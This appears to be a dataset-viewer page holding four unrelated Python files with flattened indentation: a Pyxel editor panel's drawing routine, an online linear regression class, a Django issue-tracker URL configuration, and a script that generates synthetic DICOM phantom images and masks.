self.draw_panel(self.x, self.y, self.width, self.height)
if self._is_tilemap_mode:
pyxel.bltm(
self.x + 1,
self.y + 1,
self.parent.tilemap,
self.viewport_x,
self.viewport_y,
16,
16,
)
for i in range(16):
y = self.y + i * 8 + 1
for j in range(16):
x = self.x + j * 8 + 1
val = self._overlay_canvas.data[i, j]
if val != OverlayCanvas.COLOR_NONE:
sx = (val % 32) * 8
sy = (val // 32) * 8
pyxel.blt(x, y, self.parent.image, sx, sy, 8, 8)
else:
for i in range(16):
y = self.y + i * 8 + 1
for j in range(16):
x = self.x + j * 8 + 1
val = self._overlay_canvas.data[i, j]
if val != OverlayCanvas.COLOR_NONE:
col = self._overlay_canvas.data[i, j]
else:
data = pyxel.image(self.parent.image).data
col = data[self.viewport_y + i, self.viewport_x + j]
pyxel.rect(x, y, x + 7, y + 7, col)
pyxel.line(self.x + 1, self.y + 64, self.x + 128, self.y + 64, 1)
pyxel.line(self.x + 64, self.y + 1, self.x + 64, self.y + 128, 1)
if self.parent.tool == TOOL_SELECT and self._select_x1 >= 0:
pyxel.clip(self.x + 1, self.y + 1, self.x + 128, self.y + 128)
x1 = self._select_x1 * 8 + 12
y1 = self._select_y1 * 8 + 17
x2 = self._select_x2 * 8 + 19
y2 = self._select_y2 * 8 + 24
pyxel.rectb(x1, y1, x2, y2, 15)
pyxel.rectb(x1 + 1, y1 + 1, x2 - 1, y2 - 1, 0)
pyxel.rectb(x1 - 1, y1 - 1, x2 + 1, y2 + 1, 0)
pyxel.clip()
def __on_h_scroll_bar_change(self, value):
self.viewport_x = value * 8
def __on_v_scroll_bar_change(self, value):
self.viewport_y = value * 8
|
""" Online version of regression
"""
import numpy as np
import logging
class LinReg(object):
""" Implements online version of linear regression according
to ML Lecture
"""
def __init__(self, dim_in, dim_out, dim_basis, basis_fcts):
""" Initializes Object
Args:
dim_in (int): Dimensionality of input
dim_out (int): Dimensionality of output
dim_basis (int): Dimensionality of vector of basis functions
basis_fcts (array): column array of transfer functions (first
element has to be one) with as many rows as dim_in
Note:
The basis function will be given a matrix where samples are
stored rowwise. The basis function must return a Matrix with
the same number of rows, columns may differ
Available Basis Functions:
tanh: Apply hyperbolic tangent to each element of x_{i}
sigmoid: Apply sigmoid to each element of x_{i}
polynomial: Raise each feature to power according to position
that is first feature to power 0, nth feature to power n-1
"""
self._W = np.random.randn(dim_basis, dim_out)
self._climin_W = self._W.flatten()
""" weight matrix, columns as features due to activation functions, rows as classes """
self._psi = self._register_basis_function(basis_fcts)
""" Apply respective transfer function to each feature """
def _register_basis_function(self, basis_fcts):
""" Checks if one of supported keywoards and creates fct accordingly
"""
if basis_fcts == 'tanh':
return np.tanh
elif basis_fcts == 'sigmoid':
return lambda X: np.divide(1., np.add(1., np.exp(-X)))
elif basis_fcts == 'polynomial':
return lambda X: np.power(X, np.arange(X.shape[1]))
else:
return basis_fcts
def grad(self, X, Z):
""" Calculates gradient for minibatch
Args:
X (np.ndarray): data matrix, columns are features, rows are samples
Z (np.ndarray): targets, columns are classes, rows are samples
Returns:
array of shape (classes, features)
"""
X_ = self._psi(X)
#logging.debug('LinReg.grad - Shape of transformed data: ' + \
# '{}'.format(X_.shape)
# )
# batchsize x dim_basis
Y = np.dot(X_, self._W) # (batchsize, dim_basis) * (dim_basis, dim_out)
# batchsize x dimout
D = np.subtract(Z, Y)
# (batchsize, dim_out)
g = np.dot(D.T, X_) # (dim_out, batchsize) * (batchsize, dim_basis)
# (dim_out, dim_basis)
#logging.debug('LinReg.grad - Shape gradient before normalization: ' + \
# '{}'.format(g.shape)
# )
ft_magnitudes = np.sqrt(np.sum(np.power(g, 2), axis=1)).reshape(-1, 1)
#logging.debug('LinReg.grad - magnitudes: {}'.format(ft_magnitudes))
# Take magnitude for each output dimension
g = np.divide(g, ft_magnitudes)
# ``ft_magnitudes`` is row vector of dimensionality ``dim_out``
# Therefore transpose gradient
#logging.debug('LinReg.grad - Shape gradient after normalization: ' + \
# '{}'.format(g.shape)
# )
# (dim_out, dim_basis) / (1, dim_basis) make gradient for each feature
# unitlength
return g.T
# (dim_basis, dim_out)
def loss(self, X, Z):
""" Let Y be the prediction
"""
assert Z.ndim > 1, 'Target must be two dimensional (even if one dim ' + \
'is only 1)'
Y = self.predict(X)
# (batchsize, dim_out)
D = np.subtract(Z, Y)
# (batchsize, dim_out)
loss = np.mean(np.sum(np.power(D, 2)))
# (n, dz) --> (dz,) --> (1,)
return loss
def train(self, X, Z, alpha=0.001):
""" Performs online learning step using gradient descend on a minibatch
Args:
X (numpy.ndarray): Minibatch
Z (numpy.ndarray): Targets for minibatch (rowwise,
one row one sample)
alpha (float, optional): Learning Rate
"""
assert Z.ndim > 1, 'Target must be two dimensional (even if one dim ' + \
'is only 1)'
#logging.debug(
# 'LinReg.train - Shape of weights before training: ' + \
# '{}'.format(self._W.shape)
# )
grad = self.grad(X, Z)
corr = alpha * grad
self._W = self._W + corr
#logging.debug(
# 'LinReg.train - Shape of weights after ' + \
# 'training: {}'.format(self._W.shape)
# )
def predict(self, X):
""" Predicts values for given dataset
Args:
X (numpy.ndarray): Data
Returns:
prediction, numpy.ndarray
"""
""" Predicts value for a single vector
"""
X_ = self._psi(X)
#logging.debug('LinReg.predict - shape of weights: {}'.format(self._W.shape))
#logging.debug('LinReg.predict - shape of weights: {}'.format(X_.shape))
Y = np.dot(X_, self._W)
return Y
def unpack_parameters(self, parameters):
return parameters.reshape(self._W.shape)
def climin_predict(self, parameters, input):
W = self.unpack_parameters(parameters)
X_ = self._psi(input)
Y = np.dot(X_, W)
return Y
def climin_grad(self, parameters, input, targets):
W = self.unpack_parameters(parameters)
X_ = self._psi(input)
# batchsize x dim_basis
Y = np.dot(X_, W) # (batchsize, dim_basis) * (dim_basis, dim_out)
# batchsize x dimout
D = np.subtract(targets, Y)
# (batchsize, dim_out)
g = np.dot(D.T, X_) # (dim_out, batchsize) * (batchsize, dim_basis)
# (dim_out, dim_basis)
ft_magnitudes = np.sqrt(np.sum(np.power(g, 2), axis=1)).reshape(-1, 1)
# Take magnitude for each output dimension
g = np.divide(g, ft_magnitudes)
# ``ft_magnitudes`` is row vector of dimensionality ``dim_out``
# Therefore transpose gradient
# (dim_out, dim_basis) / (1, dim_basis) make gradient for each feature
# unitlength
return g.T.flatten()
def climin_loss(self, X, Z):
""" Let Y be the prediction
"""
assert Z.ndim > 1, 'Target must be two dimensional (even if one dim ' + \
'is only 1)'
Y = self.climin_predict(self._climin_W, X)
# (batchsize, dim_out)
D = np.subtract(Z, Y)
# (batchsize, dim_out)
loss = np.mean(np.sum(np.power(D, 2)))
# (n, dz) --> (dz,) --> (1,)
return loss
|
from django.conf.urls import url
from django.contrib import admin
from medeina.views import IssueStatsView, main, ListIssuesView, UpdateIssueView
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^$', main, name='main'),
url(r'^issues/list$', ListIssuesView.as_view(), name='list_issues'),
url(
r'^issues/(?P<pk>\d+)/update$',
UpdateIssueView.as_view(),
name='update_issue'
),
url(r'^issues/stats$', IssueStatsView.as_view(), name='issue_stats'),
]
|
import os
from os.path import exists, join
import numpy as np
import imageio
import scipy.ndimage as ndi
import scipy.ndimage.morphology as morph
import scipy.ndimage.filters as filters
import pydicom
import datetime, time
import math
import imageio
import argparse
import yaml
import itertools
import png_to_dso
import shutil
# Collects User Input
parser = argparse.ArgumentParser(description="Upload Config and Output")
parser.add_argument('--config', '-c', action="store", required=False, help="Config File",default='config_dros.yaml')
parser.add_argument('--output', '-o', action="store", required=False, help="Output directory",default='Output/')
results = parser.parse_args()
# Set of Default Parameters
default_parameters = {
# Size Features
"mean_radius": [100, 100, 1],
# Shape Features
"x_deformation": [1, 1, 1],
"y_deformation": [1, 1, 1],
"z_deformation": [1, 1, 1],
"surface_frequency": [0, 0, 1],
"surface_amplitude": [0, 0, 1],
# Intensity Features
"mean_intensity": [100, 100, 1],
# Texture Features
"texture_wavelength": [0, 0, 1],
"texture_amplitude": [0, 0, 1],
# Margin Features
"gaussian_standard_deviation": [0, 0, 1]
}
# Keys in the Order for the DRO Name
ordered_keys = ["mean_radius",
"x_deformation","y_deformation", "z_deformation","surface_frequency", "surface_amplitude",
"mean_intensity",
"texture_wavelength", "texture_amplitude",
"gaussian_standard_deviation"]
# process_input
# Takes: raw yaml file received from the user
# Does: extracts all values into lists associated with each parameter
# Returns: processed dictionary of parameters names as keys and lists of values
def process_input(yml_file):
with open(yml_file) as file:
yaml_input = yaml.safe_load(file)
try:
user_parameters = yaml_input["parameters"]
if user_parameters is None:
raise Exception("Empty Parameters Dictionary")
except:
print("Error in YAML File, Defaulting to Default Parameters")
user_parameters = default_parameters
for parameter in default_parameters:
if parameter not in user_parameters or user_parameters[parameter] is None:
user_parameters[parameter] = default_parameters[parameter]
return user_parameters
# expand_range
# Takes: dictionary of parameters
# Does: expands the min, max, number of values into array of values at equal intervals
# Returns: dictionary of parameters with full arrays of values
def expand_range(dic):
expanded = {}
for key in dic.keys():
kmax = dic[key][0]
kmin = dic[key][1]
knum = dic[key][2]
expanded[key] = frange(kmin, kmax, knum)
return expanded
# generate_params
# Takes: dictionary of parameters with full arrays of values
# Does: find all combinations of parameters of all ranges of values
# Returns: array of all combinations of parameters
def generate_params(dic):
params = []
for key in ordered_keys:
params.append(dic[key])
params = list(itertools.product(*params))
params = [list(p) for p in params]
return params
# generate_all_dros
# Takes: array of all combinations of parameters
# Does: generates the images and masks for each combination of parameters
# Returns: List of all folders for all images generated
def generate_all_dros(params, output):
dicoms = []
masks = []
dsos = []
for param in params:
name, dicom, mask = generate_single_dro(param, output)
dso = png_to_dso.make_dsos(mask, dicom, output)
dicoms.append(dicom)
masks.append(mask)
dsos.append(dso)
return [dicoms, masks, dsos]
# generate
# Takes: list of arguments for a single DRO
# Does: make unique ids for the dro
# generate all files for the dro
# Return: list of the name and locations of the dros files
def generate_single_dro(arguments, output):
arguments = [float(arg) for arg in arguments]
global r, xx, yy, zz, shape_freq, shape_amp, avg, text_wav, text_amp, decay
r, xx, yy, zz, shape_freq, shape_amp, avg, text_wav, text_amp, decay = arguments
make_folders(arguments, output)
make_unique()
mask, output_array = generate_dro()
write_dro_files(mask, output_array)
return [name, dicom_folder, mask_folder]
# make_folders
# Takes: argument list for a single dro
# Does: generate unique name for the dro
# create dicom and mask folder for this dro
# Return: nothing
def make_folders(arguments, output):
global name
name = 'Phantom'
for arg in arguments:
name = name + '-' + str(arg)
global mask_folder, dicom_folder
mask_folder = os.path.join(os.path.join(output,'Mask'),name)
dicom_folder = os.path.join(os.path.join(output,'DICOM'),name)
if not exists(mask_folder):
os.makedirs(mask_folder)
if not exists(dicom_folder):
os.makedirs(dicom_folder)
return []
# make_unique
# Takes: nothing
# Does: generate unique ids for the dro
# Return: nothing
def make_unique():
global instance_uid, instance_step
instance_uid = pydicom.uid.generate_uid()[:-2] + ".1"
instance_step = instance_uid
# Generate File by Slice
def write_dro_files(mask, output_array):
n = np.shape(mask)[-1]
print('dro generated')
for k in range(n):
# Once a complete 2D Slice has been generated, write this to png and dicom
png_name = mask_folder+'/slice' + str(k).zfill(3) + '.png'
mask_slice = mask[:, :, k].astype(np.uint8)
imageio.imwrite(png_name, mask_slice)
slice_to_write = output_array[:,:,k]
write_dicom(slice_to_write, dicom_folder+'/slice' + str(k).zfill(3) + '.dcm', k,mask[:, :, k])
# generate_dro
# Takes: nothing
# Does: generate dro from its mathematical definition
# Return: image array embedding the object and mask for the object
def generate_dro():
n = 300
s = 512
# Make 3D Grid
x = np.linspace(-s/2,s/2,s)
y = np.linspace(-s/2,s/2,s)
z = np.linspace(-n/2,n/2,n)
xt, yt, zt = np.meshgrid(x,y,z,sparse=True) # xt stands for "x-true"
if xx != 1 or yy != 1 or zz != 1:
xs, ys, zs = np.meshgrid(1/float(xx)*x,1/float(yy)*y,1/float(zz)*z,sparse=True) # xs stands for "x stretch"
else:
xs, ys, zs = xt, yt, zt
# Calculate distance to origin of each point then compare to the shape of the object
origin = np.sqrt(xs*xs + ys*ys + zs*zs)
rp = r
if shape_amp != 0.0 and shape_freq != 0.0:
rp = r * (1 + shape_amp * np.sin(shape_freq * np.arccos(zs/origin)) * \
np.cos(shape_freq * np.arctan2(ys,xs)))
mask = rp >= origin
# Apply Texture
texture = np.full_like(mask,1024,dtype=float)
if text_amp != 0.0 and text_wav != 0.0:
variation = avg + text_amp * np.cos((1 / text_wav) * 2 * np.pi * xt) * \
np.cos((1 / text_wav) * 2 * np.pi * yt) * \
np.cos((1 / text_wav) * 2 * np.pi * zt)
texture += variation
else:
texture += avg
# Add blurred edge
if decay != 0:
big = morph.binary_dilation(mask,iterations=10)
texture[~big] = 0
inside = np.copy(texture)
inside[~mask] = 0
texture = filters.gaussian_filter(texture,sigma=decay)
output_array = texture
texture[mask] = 0
output_array = inside + texture
else:
texture[~mask] = 0
output_array = texture
return mask, output_array
# prepare_zips
# Takes: folders for dicoms, masks, and dsos
# Does: zips all folders
# Returns: locations of all the zipped folders
def prepare_zips(dicoms, masks, dsos, output):
cur = output
for path in dicoms:
if os.path.dirname(os.path.dirname(path)) != cur:
move = os.path.join(cur,'DICOM',os.path.basename(path))
os.rename(path,move)
for path in masks:
if os.path.dirname(os.path.dirname(path)) != cur:
move = os.path.join(cur,'Mask',os.path.basename(path))
os.rename(path,move)
for path in dsos:
if os.path.dirname(os.path.dirname(path)) != cur:
move = os.path.join(cur,'DSO',os.path.basename(path))
os.rename(path,move)
dizip = os.path.join(cur,'dicoms')
mazip = os.path.join(cur,'masks')
dszip = os.path.join(cur,'dsos')
shutil.make_archive(dizip, 'zip', os.path.join(cur,'DICOM'))
shutil.make_archive(mazip, 'zip', os.path.join(cur,'Mask'))
shutil.make_archive(dszip, 'zip', os.path.join(cur,'DSO'))
cleanup([os.path.join(cur,'DICOM'), os.path.join(cur,'Mask'), os.path.join(cur,'DSO')])
return [dizip+'.zip', mazip+'.zip', dszip+'.zip']
# cleanup
# Takes: top folder
# Does: deletes everything
# Returns: nothing
def cleanup(big_folders):
for folder in big_folders:
shutil.rmtree(folder, ignore_errors=True)
#Writes a DICOM file using an input array, filename, and slice number
def write_dicom(slice_to_write, filename, step,mask_slice):
ds = pydicom.dcmread(curr + '/dro_template.dcm')
ds.ContentDate = str(datetime.date.today()).replace('-', '')
global instance_step
if step == 0:
ds.file_meta.MediaStorageSOPInstanceUID = instance_uid
else:
instance_step = instance_step[:-5]+str(float(instance_step[-5:])+1)
ds.file_meta.MediaStorageSOPInstanceUID = instance_step
ds.SOPInstanceUID = ds.file_meta.MediaStorageSOPInstanceUID
ds.InstanceNumber = step + 1
ds[0x0009,0x111e].value = ds.file_meta.MediaStorageSOPInstanceUID
ds[0x0009,0x1146].value = ds.file_meta.MediaStorageSOPInstanceUID
ds.StudyInstanceUID = instance_uid[:-1] + '5'
ds.SeriesInstanceUID = instance_uid[:-1] + '6'
ds.PatientName = name
ds.PatientID = name
ds.PatientSex = "O"
(ds.Columns, ds.Rows) = slice_to_write.shape
slice_to_write_unsign = slice_to_write.astype(np.uint16)
ds.PixelData = slice_to_write_unsign.tostring()
ds.SliceThickness = str(1)
ds.ReconstructionDiameter = str(512.0)
ds.PixelSpacing = [str(1),str(1)]
ds.ImagePositionPatient[2] = str(float(ds.ImagePositionPatient[2]) - step * float(ds.SliceThickness))
ds.SliceLocation = str(float(ds.SliceLocation) - step * float(ds.SliceThickness))
ds.save_as(filename)
return
# Create a numpy range
def frange(start, stop, step):
return np.linspace(start, stop, num=step).tolist()
if __name__ == '__main__':
output = results.output
curr = os.path.dirname(os.path.abspath(__file__))
processed_inputs = process_input(results.config)
expanded_ranges = expand_range(processed_inputs)
full_param_list = generate_params(expanded_ranges)
dicoms, masks, dsos = generate_all_dros(full_param_list, output)
zips = prepare_zips(dicoms, masks, dsos, output)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.